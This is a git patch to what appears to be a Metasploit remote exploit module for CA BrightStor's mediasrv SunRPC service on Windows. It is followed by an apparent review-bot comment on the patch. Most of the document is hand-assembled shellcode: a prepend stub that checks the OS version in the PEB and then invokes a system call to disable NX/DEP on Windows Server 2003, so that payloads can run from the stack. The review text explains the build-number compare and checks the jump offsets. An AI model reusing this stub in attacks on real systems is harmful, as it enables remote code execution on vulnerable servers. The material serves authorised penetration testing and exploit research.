From 135e426d601a61661f2d6d1df86e537df0ecd444 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Fri, 4 May 2007 13:50:29 +0000
Subject: [PATCH] Updated prepend from topo

git-svn-id: file:///home/svn/framework3/trunk@4864 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/brightstor/mediasrv_sunrpc.rb | 27 +++++++++++--------
 1 file changed, 16 insertions(+), 11 deletions(-)

diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
index 946c716e5e..142e37576c 100644
--- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
+++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
@@ -32,17 +32,22 @@ class Exploits::Windows::Brightstor::MediasrvSunrpc < Msf::Exploit::Remote
 'Prepend' =>
 # Disable NX on 2k3 to upload data on the stack
 # (service crashes if the stack is switched to the heap)
- "\xb9\x70\x02\xfe\x7f" + # mov ecx, 0x7ffe0270
- "\x80\x39\x02" + # cmp byte ptr [ecx], 2
- "\x75\x15" + # jmp after
- "\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
- "\xb8\xed\x00\x00\x00" + # mov eax, 0xed
- "\x6a\x04" + # push 4
- "\x51" + # push ecx
- "\x6a\x22" + # push 22
- "\x6a\xff" + # push -1
- "\x6a\xff" + # push -1 (padding)
- "\xff\x12", # call dword ptr[edx]
+ "\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB
+ "\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5
+ "\x75\x30" + # jnz after
+ "\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2
+ "\x75\x27" + # jnz after
+ "\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)
+ "\x76\x1b" + # jbe after
+ "\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8]
+ "\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
+ "\xb8\xed\x00\x00\x00" + # mov eax, 0xed
+ "\x6a\x04" + # push 4
+ "\x51" + # push ecx
+ "\x6a\x22" + # push 22
+ "\x6a\xff" + # push -1
+ "\x6a\xff" + # push -1 (padding)
+ "\xff\x12", # call dword ptr[edx]
 'StackAdjustment' => -10000,
 },
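Review bot: The comment `BuildVersion (> SP0)` on the `cmp dword ptr [ecx+0xac], 0xece` line undersells what that compare tests. If the PEB layout is the usual one, offset 0xac holds OSBuildNumber as a 16-bit field with OSCSDVersion in the upper half of the same dword, so a dword compare against 0xece (3790) really means "build 3790 with a non-zero CSD word" — the build number alone is the same on every 2003 service pack, and `jbe after` skips only when the high word is zero and the build is at most 3790; a comment such as `; dword = OSCSDVersion<<16 | OSBuildNumber, > 0xece means SP1+ on build 3790` would make that explicit. Separately, `# push 22` on the `"\x6a\x22"` line mixes bare hex with the `0x`-prefixed style of the neighbouring comments and reads like decimal 22; `# push 0x22` is unambiguous. The relative jump displacements (0x30, 0x27, 0x1b) all land on the same byte past the final `call dword ptr[edx]`, so those look consistent. The enclosing info hash and class begin before and end after this hunk.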